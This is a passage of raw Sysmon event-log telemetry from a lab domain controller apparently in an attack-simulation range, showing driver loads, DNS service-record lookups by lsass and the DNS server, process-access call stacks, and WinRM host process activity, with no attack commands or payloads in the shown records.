Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000002375Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:35.860{5D479F2C-16BF-5F84-6F00-000000007F01}3212C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5D479F2C-169F-5F84-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{5D479F2C-16B1-5F84-3000-000000007F01}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 644600x80000000000000002399Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:03.246C:\Windows\System32\drivers\xencrsh.sysMD5=8498E8240422067AF19398BA0C9E71BD,SHA256=8763BD78E6D2A5C4974EE2C917069C212FA6B5E138B1DFAF3D923EC7BDA8CCE0,IMPHASH=5A51E368D0D191BA922C89AD12551EF4trueAmazon Web Services, Inc.Valid 644600x80000000000000002398Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:02.605C:\Windows\System32\drivers\xennet.sysMD5=7E6757CF81A305710B036475BCEDBC30,SHA256=9A5D7EAC527B6CDEC891C4A5C49FAF8599A1714078960DB87A7D72B0888A8987,IMPHASH=73F39C491797C6F3DFFBBE92FB638F34trueAmazon Web Services, Inc.Valid 644600x80000000000000002397Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:02.527C:\Windows\System32\drivers\xeniface.sysMD5=F1A750612F0ED79D435FA3D149331D69,SHA256=7416108B01624EBC62D5E200818D2A0AD08B8B87D13F65FDA716F7E7358C1CB1,IMPHASH=B7B4CB7750B42CE3E3BD994E129A5D9AtrueAmazon Web Services, Inc.Valid 644600x80000000000000002396Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:02.527C:\Windows\System32\drivers\xenvif.sysMD5=E7C0450691E0B3D00FC15E823FFEB779,SHA256=5C0755A4E1F4FFD7B4A442CF5E3A8CF7F0C69B1CAA2B11C67596D77E166CA419,IMPHASH=C119D28B8420C26CE25D996F6D25FD88trueAmazon Web Services, Inc.Valid 22542200x80000000000000002395Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:34.996{5D479F2C-16A1-5F84-1200-000000007F01}1208wpad1460-C:\Windows\System32\svchost.exe 22542200x80000000000000002394Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:34.728{5D479F2C-16B1-5F84-2A00-000000007F01}2900win-dc-35740600fe80::64fd:4c36:9a5d:fb14;::ffff:10.0.1.14;C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe 22542200x80000000000000002393Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:34.590{5D479F2C-169F-5F84-0B00-000000007F01}864_kerberos._tcp.Default-First-Site-Name._sites.dc._msdcs.ATTACKRANGE.LOCAL.1460-C:\Windows\System32\lsass.exe 644600x80000000000000002392Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:02.246C:\Windows\System32\drivers\xenvbd.sysMD5=8278E2B5383D2F5ED2583AC10E68E82C,SHA256=31DC4BF6BD29D3AED3588FE5A843BBD6EB6FF9D835555F7107768BA5F4E4326D,IMPHASH=B32CBE28AF26D0BACA98C88509F8A67CtrueAmazon Web Services, Inc.Valid 644600x80000000000000002391Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:03.246C:\Windows\System32\drivers\xenvbd.sysMD5=8278E2B5383D2F5ED2583AC10E68E82C,SHA256=31DC4BF6BD29D3AED3588FE5A843BBD6EB6FF9D835555F7107768BA5F4E4326D,IMPHASH=B32CBE28AF26D0BACA98C88509F8A67CtrueAmazon Web Services, Inc.Valid 644600x80000000000000002390Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:02.246C:\Windows\System32\drivers\xencrsh.sysMD5=8498E8240422067AF19398BA0C9E71BD,SHA256=8763BD78E6D2A5C4974EE2C917069C212FA6B5E138B1DFAF3D923EC7BDA8CCE0,IMPHASH=5A51E368D0D191BA922C89AD12551EF4trueAmazon Web Services, Inc.Valid 10341000x80000000000000002403Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:40.574{5D479F2C-169F-5F84-0B00-000000007F01}864904C:\Windows\system32\lsass.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002402Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:40.574{5D479F2C-169F-5F84-0B00-000000007F01}864904C:\Windows\system32\lsass.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002401Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:40.574{5D479F2C-169F-5F84-0B00-000000007F01}864904C:\Windows\system32\lsass.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 22542200x80000000000000002400Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:37.949{5D479F2C-169F-5F84-0B00-000000007F01}864_ldap._tcp.Default-First-Site-Name._sites.dc._msdcs.attackrange.local.1460-C:\Windows\System32\lsass.exe 10341000x80000000000000002406Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:45.589{5D479F2C-169F-5F84-0B00-000000007F01}864600C:\Windows\system32\lsass.exe{5D479F2C-16B1-5F84-3100-000000007F01}2212C:\Windows\system32\dns.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31375|C:\Windows\system32\lsasrv.dll+2f20b|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be 10341000x80000000000000002405Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:45.511{5D479F2C-169F-5F84-0B00-000000007F01}864600C:\Windows\system32\lsass.exe{5D479F2C-16B1-5F84-3100-000000007F01}2212C:\Windows\system32\dns.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002404Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:45.511{5D479F2C-169F-5F84-0B00-000000007F01}864600C:\Windows\system32\lsass.exe{5D479F2C-16B1-5F84-3100-000000007F01}2212C:\Windows\system32\dns.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 22542200x80000000000000002473Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:46.046{5D479F2C-169F-5F84-0B00-000000007F01}864_gc._tcp.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002472Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:46.042{5D479F2C-169F-5F84-0B00-000000007F01}864_kerberos._tcp.Default-First-Site-Name._sites.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002471Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:46.038{5D479F2C-169F-5F84-0B00-000000007F01}864_kerberos._tcp.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002470Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:46.034{5D479F2C-169F-5F84-0B00-000000007F01}864_ldap._tcp.Default-First-Site-Name._sites.dc._msdcs.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002469Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:46.031{5D479F2C-169F-5F84-0B00-000000007F01}864_ldap._tcp.dc._msdcs.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002468Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:46.027{5D479F2C-169F-5F84-0B00-000000007F01}864_kerberos._tcp.Default-First-Site-Name._sites.dc._msdcs.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002467Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:46.024{5D479F2C-169F-5F84-0B00-000000007F01}864_kerberos._tcp.dc._msdcs.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002466Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:46.020{5D479F2C-169F-5F84-0B00-000000007F01}8649320658a-9ef1-40fd-9c0f-a09046237e1c._msdcs.attackrange.local.0type: 5 win-dc-3574060.attackrange.local;C:\Windows\System32\lsass.exe 22542200x80000000000000002465Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:46.017{5D479F2C-169F-5F84-0B00-000000007F01}864gc._msdcs.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002464Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:46.014{5D479F2C-169F-5F84-0B00-000000007F01}864_ldap._tcp.ca31a951-1d22-4b6d-9d2e-054e40a554e4.domains._msdcs.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002463Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:46.009{5D479F2C-169F-5F84-0B00-000000007F01}864_ldap._tcp.Default-First-Site-Name._sites.gc._msdcs.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002462Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:46.006{5D479F2C-169F-5F84-0B00-000000007F01}864_ldap._tcp.gc._msdcs.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002461Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:46.005{5D479F2C-169F-5F84-0B00-000000007F01}864_msdcs.attackrange.local.0type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002460Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:46.004{5D479F2C-169F-5F84-0B00-000000007F01}864_msdcs.attackrange.local.0type: 2 win-dc-3574060.attackrange.local;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002459Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:46.003{5D479F2C-169F-5F84-0B00-000000007F01}864_ldap._tcp.pdc._msdcs.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002458Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:46.002{5D479F2C-169F-5F84-0B00-000000007F01}864_ldap._tcp.gc._msdcs.attackrange.local.0type: 33 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002457Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:45.993{5D479F2C-169F-5F84-0B00-000000007F01}864_ldap._tcp.Default-First-Site-Name._sites.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002456Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:45.989{5D479F2C-169F-5F84-0B00-000000007F01}864_ldap._tcp.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002455Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:45.989{5D479F2C-169F-5F84-0B00-000000007F01}864_ldap._tcp.Default-First-Site-Name._sites.gc._msdcs.attackrange.local.0type: 33 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002454Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:45.989{5D479F2C-16A1-5F84-1400-000000007F01}1308_ldap._tcp.Default-First-Site-Name._sites.gc._msdcs.attackrange.local.0type: 33 ;10.0.1.14;C:\Windows\System32\svchost.exe 22542200x80000000000000002453Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:45.987{5D479F2C-169F-5F84-0B00-000000007F01}864attackrange.local.0type: 2 win-dc-3574060.attackrange.local;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002452Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:45.987{5D479F2C-16B1-5F84-3100-000000007F01}2212attackrange.local0type: 6 ;10.0.1.14;C:\Windows\System32\dns.exe 22542200x80000000000000002451Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:45.987{5D479F2C-16B1-5F84-3100-000000007F01}2212attackrange.local0type: 2 win-dc-3574060.attackrange.local;10.0.1.14;C:\Windows\System32\dns.exe 22542200x80000000000000002450Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:45.986{5D479F2C-169F-5F84-0B00-000000007F01}864_ldap._tcp.attackrange.local.0type: 33 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002449Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:45.985{5D479F2C-16B1-5F84-3100-000000007F01}2212win-dc-3574060.attackrange.local9501type: 6 ;10.0.1.14;C:\Windows\System32\dns.exe 22542200x80000000000000002448Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:45.985{5D479F2C-169F-5F84-0B00-000000007F01}864attackrange.local.0type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002447Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:45.981{5D479F2C-16A1-5F84-1400-000000007F01}1308eu-central-1.compute.internal9501-C:\Windows\System32\svchost.exe 22542200x80000000000000002446Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:45.977{5D479F2C-169F-5F84-0B00-000000007F01}864_ldap._tcp.Default-First-Site-Name._sites.attackrange.local.0type: 33 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002445Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:45.516{5D479F2C-16B1-5F84-3100-000000007F01}2212win-dc-3574060.attackrange.local0fe80::64fd:4c36:9a5d:fb14;::ffff:10.0.1.14;C:\Windows\System32\dns.exe 22542200x80000000000000002444Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:45.515{5D479F2C-169F-5F84-0B00-000000007F01}864WIN-DC-35740600fe80::64fd:4c36:9a5d:fb14;::ffff:10.0.1.14;C:\Windows\System32\lsass.exe 10341000x80000000000000002443Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:46.136{5D479F2C-16A1-5F84-1400-000000007F01}13081548C:\Windows\system32\svchost.exe{5D479F2C-16CA-5F84-7300-000000007F01}4228C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x80000000000000002442Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:46.136{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16CA-5F84-7300-000000007F01}4228C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002441Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:46.120{5D479F2C-16CA-5F84-7400-000000007F01}42404260C:\Windows\system32\conhost.exe{5D479F2C-16CA-5F84-7300-000000007F01}4228C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002440Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:46.120{5D479F2C-16A1-5F84-1400-000000007F01}13081940C:\Windows\system32\svchost.exe{5D479F2C-16CA-5F84-7100-000000007F01}4164C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x80000000000000002439Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:46.120{5D479F2C-169F-5F84-0500-000000007F01}6482424C:\Windows\system32\csrss.exe{5D479F2C-16CA-5F84-7400-000000007F01}4240C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002438Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:46.120{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002437Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 